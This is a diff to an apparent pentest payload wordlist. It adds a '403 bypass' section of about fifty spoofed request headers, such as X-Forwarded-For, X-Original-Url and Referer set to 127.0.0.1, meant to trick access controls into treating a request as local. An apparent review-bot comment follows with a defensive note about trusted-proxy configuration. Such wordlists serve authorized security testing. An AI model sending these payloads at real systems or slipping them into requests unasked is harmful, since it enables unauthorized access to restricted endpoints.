diff --git a/Authentication-Bypass/auth-bypass-payloads.txt b/Authentication-Bypass/auth-bypass-payloads.txt
index 11dcfb6..1d9f8d8 100644
--- a/Authentication-Bypass/auth-bypass-payloads.txt
+++ b/Authentication-Bypass/auth-bypass-payloads.txt
@@ -451,3 +451,54 @@ postMessage({type:'auth',token:'admin_token'}, '*')
 X-HTTP-Method-Override: GET
 X-Method-Override: GET
 # Change POST to GET to bypass CSRF and auth checks
+
+# ============================================
+# 403 BYPASS HEADERS
+# ============================================
+
+# IP spoofing / access control bypass headers
+X-Forwarded-For: 127.0.0.1
+X-Forwarded-For-Original: 127.0.0.1
+X-Forward-For: 127.0.0.1
+X-Forwarder-For: 127.0.0.1
+X-Forwarded: 127.0.0.1
+X-Forwarded-By: 127.0.0.1
+X-Forwarded-Host: 127.0.0.1
+X-Forwarded-Server: 127.0.0.1
+X-Forwarded-Scheme: https
+X-Forwarded-Scheme: http
+X-Forwarded-Port: 80
+X-Forwarded-Port: 443
+X-Forwarded-Port: 8080
+X-Forwarded-Port: 8443
+X-Client-IP: 127.0.0.1
+X-Real-Ip: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+X-Original-Remote-Addr: 127.0.0.1
+X-Originating-IP: 127.0.0.1
+X-True-IP: 127.0.0.1
+X-Custom-IP-Authorization: 127.0.0.1
+Client-IP: 127.0.0.1
+Real-Ip: 127.0.0.1
+
+# URL / host override headers
+X-Original-Url: 127.0.0.1
+X-Rewrite-Url: 127.0.0.1
+X-Http-Host-Override: 127.0.0.1
+X-Http-Destinationurl: 127.0.0.1
+X-Host: 127.0.0.1
+X-Proxy-Url: 127.0.0.1
+Proxy-Url: 127.0.0.1
+Proxy-Host: 127.0.0.1
+Http-Url: 127.0.0.1
+Base-Url: 127.0.0.1
+Url: 127.0.0.1
+Uri: 127.0.0.1
+Request-Uri: 127.0.0.1
+Redirect: 127.0.0.1
+
+# Referer / referrer spoofing
+Referer: 127.0.0.1
+Referrer: 127.0.0.1
+Refferer: 127.0.0.1
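Review bot: The `# IP spoofing / access control bypass headers` section is missing the one sentence that tells a reader when these entries are meaningful, which is also the defensive takeaway: they only matter where the application or its reverse proxy honours client-supplied forwarding headers instead of overwriting them from a configured trusted-proxy list. Suggest extending the comment to `# IP spoofing / access control bypass headers (only honoured where the edge proxy does not strip or overwrite client-supplied X-Forwarded-*/client-IP headers)`. The `Refferer: 127.0.0.1` line at the end of the hunk looks like a deliberate misspelling variant rather than a typo; a trailing `# intentional misspelling` would stop a later contributor from "correcting" it. The hunk also contains no duplicate-entry check against the earlier part of the file, which is outside this view, so overlap with existing `X-Forwarded-For` entries cannot be ruled out from here.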